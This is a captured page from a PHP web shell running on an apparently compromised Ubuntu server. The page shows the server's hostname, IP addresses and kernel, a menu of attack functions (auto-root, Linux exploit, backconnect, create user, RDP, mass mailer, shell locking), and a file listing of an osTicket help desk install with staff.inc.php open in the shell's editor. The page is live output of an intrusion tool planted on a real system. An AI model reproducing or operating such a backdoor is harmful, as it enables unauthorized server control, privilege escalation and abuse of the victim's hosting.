Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
scp /
[ HOME SHELL ]
Name
Size
Permission
Action
apps
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
admin.inc.php
2.77
KB
-rw-r--r--
admin.php
70
B
-rw-r--r--
ajax.php
15.5
KB
-rw-r--r--
apikeys.php
5.44
KB
-rw-r--r--
audits.php
939
B
-rw-r--r--
autocron.php
2.32
KB
-rw-r--r--
banlist.php
7.15
KB
-rw-r--r--
canned.php
8.51
KB
-rw-r--r--
categories.php
7.2
KB
-rw-r--r--
dashboard.php
1.75
KB
-rw-r--r--
departments.php
13.45
KB
-rw-r--r--
directory.php
797
B
-rw-r--r--
emails.php
3.77
KB
-rw-r--r--
emailsettings.php
1.32
KB
-rw-r--r--
emailtest.php
5.49
KB
-rw-r--r--
export.php
757
B
-rw-r--r--
faq.php
6.7
KB
-rw-r--r--
filters.php
6.83
KB
-rw-r--r--
forms.php
6.82
KB
-rw-r--r--
helptopics.php
11.05
KB
-rw-r--r--
index.php
548
B
-rw-r--r--
kb.php
1.05
KB
-rw-r--r--
lists.php
8.39
KB
-rw-r--r--
login.php
3.7
KB
-rw-r--r--
logo.php
1.32
KB
-rw-r--r--
logout.php
1.12
KB
-rw-r--r--
logs.php
2.25
KB
-rw-r--r--
orgs.php
4.86
KB
-rw-r--r--
pages.php
6.75
KB
-rw-r--r--
plugins.php
2.05
KB
-rw-r--r--
profile.php
2.06
KB
-rw-r--r--
pwreset.php
2.99
KB
-rw-r--r--
queues.php
3.65
KB
-rw-r--r--
roles.php
5.84
KB
-rw-r--r--
schedules.php
2.49
KB
-rw-r--r--
settings.php
2
KB
-rw-r--r--
slas.php
6.07
KB
-rw-r--r--
staff.inc.php
4.83
KB
-rw-r--r--
staff.php
8.79
KB
-rw-r--r--
system.php
772
B
-rw-r--r--
tasks.php
9.96
KB
-rw-r--r--
teams.php
5.93
KB
-rw-r--r--
templates.php
9.04
KB
-rw-r--r--
tickets.php
23.35
KB
-rw-r--r--
upgrade.php
3.32
KB
-rw-r--r--
users.php
9.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : staff.inc.php
<?php /************************************************************************* staff.inc.php File included on every staff page...handles logins (security) and file path issues. Peter Rotich <peter@osticket.com> Copyright (c) 2006-2013 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ if(basename($_SERVER['SCRIPT_NAME'])==basename(__FILE__)) die('Access denied'); //Say hi to our friend.. if(!file_exists('../main.inc.php')) die('Fatal error... Get technical help!'); require_once('../main.inc.php'); if(!defined('INCLUDE_DIR')) die('Fatal error... invalid setting.'); // Enforce ACL (if applicable) if (!Validator::check_acl('staff')) die(__('Access Denied')); /*Some more include defines specific to staff only */ define('STAFFINC_DIR',INCLUDE_DIR.'staff/'); define('SCP_DIR',str_replace('//','/',dirname(__FILE__).'/')); /* Define tag that included files can check */ define('OSTSCPINC',TRUE); define('OSTSTAFFINC',TRUE); /* Tables used by staff only */ define('KB_PREMADE_TABLE',TABLE_PREFIX.'kb_premade'); /* include what is needed on staff control panel */ require_once(INCLUDE_DIR.'class.staff.php'); require_once(INCLUDE_DIR.'class.csrf.php'); /* First order of the day is see if the user is logged in and with a valid session. * User must be valid staff beyond this point * ONLY super admins can access the helpdesk on offline state. */ if(!function_exists('staffLoginPage')) { //Ajax interface can pre-declare the function to trap expired sessions. function staffLoginPage($msg) { global $ost, $cfg; $_SESSION['_staff']['auth']['dest'] = '/' . ltrim($_SERVER['REQUEST_URI'], '/'); $_SESSION['_staff']['auth']['msg']=$msg; // Redirect here with full path for application-type plugins Http::redirect(ROOT_PATH.'scp/login.php'); exit; } } $thisstaff = StaffAuthenticationBackend::getUser(); // Bootstrap gettext translations as early as possible, but after attempting // to sign on the agent TextDomain::configureForUser($thisstaff); //1) is the user Logged in for real && is staff. if (!$thisstaff || !$thisstaff->getId() || !$thisstaff->isValid()) { if (isset($_SESSION['_staff']['auth']['msg'])) { $msg = $_SESSION['_staff']['auth']['msg']; unset($_SESSION['_staff']['auth']['msg']); } elseif ($thisstaff && !$thisstaff->isValid()) $msg = __('Session timed out due to inactivity'); else $msg = __('Authentication Required'); staffLoginPage($msg); exit; } //2) if not super admin..check system status and group status if(!$thisstaff->isAdmin()) { //Check for disabled staff or group! if (!$thisstaff->isActive()) { staffLoginPage(__('Access Denied. Contact Admin')); exit; } //Staff are not allowed to login in offline mode!! if(!$ost->isSystemOnline() || $ost->isUpgradePending()) { staffLoginPage(__('System Offline')); exit; } } //Keep the session activity alive $thisstaff->refreshSession(); /******* CSRF Protectin *************/ // Enforce CSRF protection for POSTS if ($_POST && !$ost->checkCSRFToken()) { Http::response(400, __('Valid CSRF Token Required')); exit; } //Add token to the header - used on ajax calls [DO NOT CHANGE THE NAME] $ost->addExtraHeader('<meta name="csrf_token" content="'.$ost->getCSRFToken().'" />'); // Load the navigation after the user in case some things are hidden require_once(INCLUDE_DIR.'class.nav.php'); /******* SET STAFF DEFAULTS **********/ define('PAGE_LIMIT', $thisstaff->getPageLimit() ?: DEFAULT_PAGE_LIMIT); $tabs=array(); $submenu=array(); $exempt = in_array(basename($_SERVER['SCRIPT_NAME']), array('logout.php', 'ajax.php', 'logs.php', 'upgrade.php')); if($ost->isUpgradePending() && !$exempt) { $errors['err']=$sysnotice=__('System upgrade is pending').' <a href="upgrade.php">'.__('Upgrade Now').'</a>'; require('upgrade.php'); exit; } elseif($cfg->isHelpDeskOffline()) { $sysnotice='<strong>'.__('System is set to offline mode').'</strong> - '.__('Client interface is disabled and ONLY admins can access staff control panel.'); $sysnotice.=' <a href="settings.php">'.__('Enable').'</a>.'; } if (!defined('AJAX_REQUEST')) $nav = new StaffNav($thisstaff); //Check for forced password change. if($thisstaff->forcePasswdChange() && !$exempt) { # XXX: Call staffLoginPage() for AJAX and API requests _not_ to honor # the request $sysnotice = __('Password change required to continue'); require('profile.php'); //profile.php must request this file as require_once to avoid problems. exit; } $ost->setWarning($sysnotice); $ost->setPageTitle(__('osTicket :: Staff Control Panel')); ?>
Close
